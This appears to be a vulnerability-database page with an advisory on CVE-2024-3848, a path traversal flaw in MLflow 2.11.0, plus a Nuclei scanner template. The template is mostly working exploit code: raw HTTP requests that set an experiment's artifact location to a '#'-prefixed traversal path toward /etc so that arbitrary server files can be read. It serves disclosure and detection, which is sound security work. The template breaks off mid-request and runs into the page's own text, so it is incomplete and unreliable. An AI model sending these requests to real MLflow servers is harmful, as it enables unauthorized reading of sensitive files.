Path Traversal Bypass in Artifact Retrieval
A vulnerability in mlflow version 2.11.0 allows for path traversal due to improper validation of artifact URLs. By appending a '#' to the URL, attackers can bypass security checks and read arbitrary files. This issue was patched in version 2.12.1.
Available publicly on Apr 26 2024 | Available with Premium on Apr 17 2024
Nuclei Template
Nuclei Template
1id: mlflow-lfi-hash-bypass
2info:
3 name: MLFlow LFI via model registration API with hash bypass
4 author: asimovl, byt3bl33d3r, DanMcInerney
5 severity: high
6 description: MLflow local file include via hash bypass in model registration API.
7 reference:
8 - https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
9 classification:
10 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
11 cvss-score: 7.5
12 cve-id: CVE-2024-3848
13 cwe-id: CWE-29
14 tags: mlflow,ml,ai,cve,huntr,lfi,protectai
15variables:
16 experiment_name: "{{rand_text_alpha(6)}}"
17http:
18 - raw:
19 - |
20 POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
21 Host: {{Hostname}}
22 Content-Type: application/json
23
24 {"name": "{{experiment_name}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}
25 - |
26 POST /api/2.0/mlflow/runs/create HTTP/1.1
27 Host: {{Hostname}}
28 Content-Type: application/json
29
30 {"experiment_id": "{{exid}}"}
31 - |
32 POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
33 Host: {{Hostname}}
34 Content-Type: application/json
35
36 {"name": "{{experiment_name}}"}
37 - |
38 POST /ajax-api/2.0/mlflow/modeResources
Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have - related security advisories that are available with Sightline Premium.